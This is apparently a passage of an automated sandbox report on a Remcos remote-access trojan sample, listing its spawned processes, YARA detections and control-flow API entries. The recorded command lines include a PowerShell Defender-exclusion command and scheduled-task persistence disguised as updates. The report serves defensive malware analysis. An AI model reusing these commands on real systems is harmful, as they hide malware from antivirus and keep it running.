                      Start time:13:41:57
                      Start date:01/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:5
                      Start time:13:41:57
                      Start date:01/07/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jdSldfVS.exe"
                      Imagebase:0xf30000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:6
                      Start time:13:41:57
                      Start date:01/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:7
                      Start time:13:41:57
                      Start date:01/07/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp"
                      Imagebase:0x820000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:8
                      Start time:13:41:57
                      Start date:01/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:9
                      Start time:13:41:58
                      Start date:01/07/2024
                      Path:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
                      Imagebase:0x9a0000
                      File size:1'011'712 bytes
                      MD5 hash:EA0D00B95A91C801893B5526347170BB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4580750131.0000000002B6F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      Target ID:10
                      Start time:13:41:58
                      Start date:01/07/2024
                      Path:C:\Users\user\AppData\Roaming\jdSldfVS.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\jdSldfVS.exe
                      Imagebase:0xd90000
                      File size:1'011'712 bytes
                      MD5 hash:EA0D00B95A91C801893B5526347170BB
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 32%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:11
                      Start time:13:41:59
                      Start date:01/07/2024
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff717f30000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:13
                      Start time:13:42:02
                      Start date:01/07/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpBFB2.tmp"
                      Imagebase:0x820000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:14
                      Start time:13:42:02
                      Start date:01/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:15
                      Start time:13:42:02
                      Start date:01/07/2024
                      Path:C:\Users\user\AppData\Roaming\jdSldfVS.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Roaming\jdSldfVS.exe"
                      Imagebase:0x2a0000
                      File size:1'011'712 bytes
                      MD5 hash:EA0D00B95A91C801893B5526347170BB
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:16
                      Start time:13:42:02
                      Start date:01/07/2024
                      Path:C:\Users\user\AppData\Roaming\jdSldfVS.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Roaming\jdSldfVS.exe"
                      Imagebase:0x3a0000
                      File size:1'011'712 bytes
                      MD5 hash:EA0D00B95A91C801893B5526347170BB
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:17
                      Start time:13:42:02
                      Start date:01/07/2024
                      Path:C:\Users\user\AppData\Roaming\jdSldfVS.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\jdSldfVS.exe"
                      Imagebase:0x5b0000
                      File size:1'011'712 bytes
                      MD5 hash:EA0D00B95A91C801893B5526347170BB
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.2185308624.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                      Reputation:low
                      Has exited:true


                        Execution Graph

                        Execution Coverage:9.3%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:9.2%
                        Total number of Nodes:185
                        Total number of Limit Nodes:10

                        Control-flow Graph

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: $ $ $ $ $&$&$&$&$&$-$-$.$7$7$7$7$9$9$9$>$>$>$>$U$g$g$k$k$u$u$u$u
                        • API String ID: 0-796196984
                        • Opcode ID: c48736c4a8c0582654edce6b2d3fdcdd0797c95ee566cc27cf4327ffa60d8df7
                        • Instruction ID: 6d26581b380a9b9d31009722a0baa9f7decec21de0cdfcc17fef81b77af6c625
                        • Opcode Fuzzy Hash: c48736c4a8c0582654edce6b2d3fdcdd0797c95ee566cc27cf4327ffa60d8df7
                        • Instruction Fuzzy Hash: B0232970910B45CFD725EF34C844AA9B7B2FF99304F518AADD1496B360EB71AA85CF40

                        Control-flow Graph

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: $ $ $ $ $&$&$&$&$&$-$-$.$7$7$7$7$9$9$9$>$>$>$>$g$g$k$k$u$u$u$u
                        • API String ID: 0-2584884043
                        • Opcode ID: 782e79b8a4c733bc9556b70faf69e923ed6c57c0b71425121558cf8c152cb3f7
                        • Instruction ID: 6a59cc542022cbdf3a02dd75377115355f6c33a11c5bfd4d53dd4f7b756b0b10
                        • Opcode Fuzzy Hash: 782e79b8a4c733bc9556b70faf69e923ed6c57c0b71425121558cf8c152cb3f7
                        • Instruction Fuzzy Hash: 46232870910B45CFDB25EF34C844AA9B7B2FF99304F518AADD1496B360EB71AA85CF40
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ab52b2ea9a657ff72eb48a629d0b7a93d57075420440a268a5002e6925ff5988
                        • Instruction ID: 48c69088fa8d42f500f46e458eca7f99bd2cbd618b26567dc00818a155100e5a
                        • Opcode Fuzzy Hash: ab52b2ea9a657ff72eb48a629d0b7a93d57075420440a268a5002e6925ff5988
                        • Instruction Fuzzy Hash: 9EA19F35E00319CFCB05DFA5D884EADBBBAFF89300F158665E416AB2A5DB70E941CB50
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7f1ab1159f39e5dbf1434cf2c59daecbe4d65710a2ef0761cb20618309f5f076
                        • Instruction ID: 8a04ee72ed859129c3317b7c186c08c32954e9bd134748955c70e2a20f868c0d
                        • Opcode Fuzzy Hash: 7f1ab1159f39e5dbf1434cf2c59daecbe4d65710a2ef0761cb20618309f5f076
                        • Instruction Fuzzy Hash: 47919235E00319CFCB05DFA1D984DEDB7BAFF99310B158655E416AB2A4EB30E982CB50

                        Control-flow Graph

                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 00ACDC86
                        • GetCurrentThread.KERNEL32 ref: 00ACDCC3
                        • GetCurrentProcess.KERNEL32 ref: 00ACDD00
                        • GetCurrentThreadId.KERNEL32 ref: 00ACDD59
                        Memory Dump Source
                        • Source File: 00000000.00000002.2166318759.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ac0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: 8be493c7c4ffedebc12aa42f42a926c3ab4ff93c2d60ec273f7fc70086c0ea70
                        • Instruction ID: 89e812693c4abb2d202c367aa9e243cf55aa899cf8976f29b003974208a9d767
                        • Opcode Fuzzy Hash: 8be493c7c4ffedebc12aa42f42a926c3ab4ff93c2d60ec273f7fc70086c0ea70
                        • Instruction Fuzzy Hash: 8C5158B0D01209CFEB04CFA9D548B9EBBF1EF88314F25846DE419A7360D774A944CB65

                        Control-flow Graph

                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00ACC0A6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2166318759.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ac0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: bfb12773058f32041711fa12c84f03700f698bf8f6642432ff10233f58953ba6
                        • Instruction ID: 82ef8765e18d8a21a239f4dac5ea578e71dfab3b3259b6313a903b2cc8cedae8
                        • Opcode Fuzzy Hash: bfb12773058f32041711fa12c84f03700f698bf8f6642432ff10233f58953ba6
                        • Instruction Fuzzy Hash: 4E813370A10B058FD724DF29D441B9ABBF5FF88300F11892EE48ADBA50D775E945CBA1

                        Control-flow Graph

                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 049E27C2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: e97b79f637d324f3311121c2f986d5c51246c853182713e389920d4800c125de
                        • Instruction ID: 17e85f03a3c5a6057c12a2a3a116115b1c352b2b001dcf767e9d8cb50fd0c9a9
                        • Opcode Fuzzy Hash: e97b79f637d324f3311121c2f986d5c51246c853182713e389920d4800c125de
                        • Instruction Fuzzy Hash: 2C51D1B1C00249AFDF15CFA9C880ADDBFB5FF48310F15816AE918AB221D771A995CF51

                        Control-flow Graph

                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 049E27C2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: 2ffb015f2082b8d4aa14e237a2eed04c36be367b67ffd8e62656838af7de864f
                        • Instruction ID: 76c3fc0f188e2de4e21578e6f22b64fb2921f60828d095bd8d3e50456b06d00f
                        • Opcode Fuzzy Hash: 2ffb015f2082b8d4aa14e237a2eed04c36be367b67ffd8e62656838af7de864f
                        • Instruction Fuzzy Hash: 4C41B2B5D00349DFDB15CF9AC884ADEBBB5BF88310F24812AE819AB210D775A845CF91

                        Control-flow Graph

                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00AC34D1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2166318759.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ac0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 5caeca3a22d73999a17fd72ce77db48ac13c5fa3d8022f7ba9c55ff53a05dfd6
                        • Instruction ID: d7e27e0ed6b0dfe5e6649520b22d99704c41e58639c95df851d44b0c53d5ff8c
                        • Opcode Fuzzy Hash: 5caeca3a22d73999a17fd72ce77db48ac13c5fa3d8022f7ba9c55ff53a05dfd6
                        • Instruction Fuzzy Hash: 1341DEB1C00619CFDB24CFAAC944BCEBBB1BF89704F2081AAD409AB251DB755949CF51

                        Control-flow Graph

                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 049E4D11
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        • Opcode ID: b6bec6c4d2d3e3dd2df241bfdb3dac97ea1d3c48f9a70a954137cd49f280be67
                        • Instruction ID: ef84a7d6b47f2c3088ee080d6a56f347b7061f2259d5408a7e15eff6c76e18c6
                        • Opcode Fuzzy Hash: b6bec6c4d2d3e3dd2df241bfdb3dac97ea1d3c48f9a70a954137cd49f280be67
                        • Instruction Fuzzy Hash: 3F412AB5A00305DFDB15CF9AC448AAABBF5FB88314F24C559D519AB321D774E841CFA0

                        Control-flow Graph

                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00AC34D1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2166318759.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ac0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: dd471aabb278df223b95cc0360384f7c3d986cc8c9b4dc5d3507fc1da531fe1b
                        • Instruction ID: c9d720f7b85c9fcbb48b9818d466a9b473c8d4c54db20983886ee6c878e2078b
                        • Opcode Fuzzy Hash: dd471aabb278df223b95cc0360384f7c3d986cc8c9b4dc5d3507fc1da531fe1b
                        • Instruction Fuzzy Hash: 8541CEB1C0061DCFDB24CFAAC844B8EBBB5BF88704F2081AAD409AB255DB756945CF90

                        Control-flow Graph

                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ACE2DF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2166318759.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ac0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: c260e0deb5dba1ac3cd63d5d634a7695f4c4e7386a9bcf38b3a7a4191802cb08
                        • Instruction ID: a585cc6c210cbca640a345dbd2f1741c7ba8dca35792031a3d04bb009e280c10
                        • Opcode Fuzzy Hash: c260e0deb5dba1ac3cd63d5d634a7695f4c4e7386a9bcf38b3a7a4191802cb08
                        • Instruction Fuzzy Hash: 5C21E4B59002199FDB10CF9AD884ADEBBF8EB48310F14801AE918A3310D374A954CFA5

                        Control-flow Graph

                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00ACC121,00000800,00000000,00000000), ref: 00ACC332
                        Memory Dump Source
                        • Source File: 00000000.00000002.2166318759.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ac0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: e3b047dcffe5a015d4e073873f8e0505dbdea885f83da7997d15df98642d83fa
                        • Instruction ID: e76d4a9ec01463bdaad338795e1ec0c75b788fa8714b2e36798b8ad51ba6293f
                        • Opcode Fuzzy Hash: e3b047dcffe5a015d4e073873f8e0505dbdea885f83da7997d15df98642d83fa
                        • Instruction Fuzzy Hash: 281114B69002498FDB10CF9AD844ADEFBF4EB88324F15842ED519AB300C775A546CFA1

                        Control-flow Graph

                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00ACC121,00000800,00000000,00000000), ref: 00ACC332
                        Memory Dump Source
                        • Source File: 00000000.00000002.2166318759.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ac0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 66b2ae8056c3efdb7d8da322ede9cd824a7839809b560663ab0f297641821f1e
                        • Instruction ID: e14e8955012412c1571c0bff8331930fe356d71a75c17e5a80f75f3a6dde797c
                        • Opcode Fuzzy Hash: 66b2ae8056c3efdb7d8da322ede9cd824a7839809b560663ab0f297641821f1e
                        • Instruction Fuzzy Hash: A31103B68002498FDB10CF9AD444BDEFBF4EB48320F15842EE519A7200C379A945CFA5

                        Control-flow Graph

                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00ACC0A6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2166318759.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ac0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: ffa672b6ec0851992620e7fb06a8a335a6e2ae62f48ad24914c72cad3e124bac
                        • Instruction ID: 84e1ccd549f5a49d69b308dd98da351f0ec561088c0e61838aacb4f6984b4ba4
                        • Opcode Fuzzy Hash: ffa672b6ec0851992620e7fb06a8a335a6e2ae62f48ad24914c72cad3e124bac
                        • Instruction Fuzzy Hash: A211FDB6C00249CFDB10CF9AC444B9EFBF4AB88324F11851AD819A7210C379A945CFA1

                        Control-flow Graph

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: *
                        • API String ID: 0-163128923
                        • Opcode ID: fa2d417f8882ce9a4f11cad721b828e3a583f0859160a6ce2ba7dc694c04948e
                        • Instruction ID: 58f33c5b1c4c8cd8a55234ed5ffa9f181e5f495d6bcc67abc1dd8d52c76b5e6c
                        • Opcode Fuzzy Hash: fa2d417f8882ce9a4f11cad721b828e3a583f0859160a6ce2ba7dc694c04948e
                        • Instruction Fuzzy Hash: 80418E70E5522ADFDB54EFACD8416EEBBB1FF49340F104969D402EB290E7319A06CB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: r
                        • API String ID: 0-1812594589
                        • Opcode ID: 54148570d7cd29a78f1f550a1e3c3ac8e81ee9b9ed98616435f6e7125ee08e62
                        • Instruction ID: 3ede00c856d6d22cb49239fae081b0dacc3defe6c62be3c18696609fedbbdcf6
                        • Opcode Fuzzy Hash: 54148570d7cd29a78f1f550a1e3c3ac8e81ee9b9ed98616435f6e7125ee08e62
                        • Instruction Fuzzy Hash: 4E413674D4522ADFDB84EFA9E084AEDBBB5FF4D305F108059E41AA7211C7359851CFA0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: 3
                        • API String ID: 0-1842515611
                        • Opcode ID: 1d00cccc4ae1b5456353f913ebf8bfea72e185bd8a80484796c25f8a28da92c9
                        • Instruction ID: efc6d41baeba7f3b088277b4e1c69f439aae7fa05381f750979e750166205fb3
                        • Opcode Fuzzy Hash: 1d00cccc4ae1b5456353f913ebf8bfea72e185bd8a80484796c25f8a28da92c9
                        • Instruction Fuzzy Hash: 09212930A48266DFE345FB5CD850A397BB5DB85214F15809BD8099F352CA32DE82C7E1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: O
                        • API String ID: 0-878818188
                        • Opcode ID: 56b87d6f8cdcb7e148d7fa1d1849db150c5da8fa8230ae6b05a1a75c93174a86
                        • Instruction ID: 0cd1d622e3f020ba02fd7fc33bf81269066db20f71b3dcac6133cd4925361fc0
                        • Opcode Fuzzy Hash: 56b87d6f8cdcb7e148d7fa1d1849db150c5da8fa8230ae6b05a1a75c93174a86
                        • Instruction Fuzzy Hash: 81218E70A00618CFD725DF69C88496BBBF6EF89304B15886DD159DB321EB30E906CB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: O
                        • API String ID: 0-878818188
                        • Opcode ID: fd3a5e6dd450fb8e3c20027b5cccb956834c7a91638283cbfa1cacd6e1054458
                        • Instruction ID: 4193dfa939603670ce356148ba9d9f211e63aab42d574ce6cf6bfd1477335f26
                        • Opcode Fuzzy Hash: fd3a5e6dd450fb8e3c20027b5cccb956834c7a91638283cbfa1cacd6e1054458
                        • Instruction Fuzzy Hash: F9115E71A00614CFD724DF69C84496BBBFAEF89704B00886DD5599B320EB31E905CB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: T
                        • API String ID: 0-3187964512
                        • Opcode ID: f7f5de64090e523de4bf7d2eacde4dd8c63f698b724761383c8cbdb45147dd82
                        • Instruction ID: 5bdf3711b4aa6eafb9747aecf8d5987b6af0da88d387e3fc523bfb8e19de5d0d
                        • Opcode Fuzzy Hash: f7f5de64090e523de4bf7d2eacde4dd8c63f698b724761383c8cbdb45147dd82
                        • Instruction Fuzzy Hash: 7DF09AB098522ACFEB41EF18EC81BE8BBB9FF45304F1090A6D509B7216D770A985CF50
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: *
                        • API String ID: 0-163128923
                        • Opcode ID: 5b4d99f66b2d49ba9025cd70ffdaae8ed2a0630d6791c3ada67969d01e5fa2df
                        • Instruction ID: 289026a53d60006f4b2111278e74ce9e09b9712c8f03f4432c61bb7d89b02864
                        • Opcode Fuzzy Hash: 5b4d99f66b2d49ba9025cd70ffdaae8ed2a0630d6791c3ada67969d01e5fa2df
                        • Instruction Fuzzy Hash: 79E0C270849279DFC341DB68D8841E8BB74EF02350B1900D9D80587062EA620F259781
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: *
                        • API String ID: 0-163128923
                        • Opcode ID: 1adc9c2434f6e1dd016ba5a0eff0f11be07b37f42910844c2e2442ef30a27656
                        • Instruction ID: 4c81595c6be93d2086295057f65a860dd53d6a830cdb5cdad3181ecf47c5a1d4
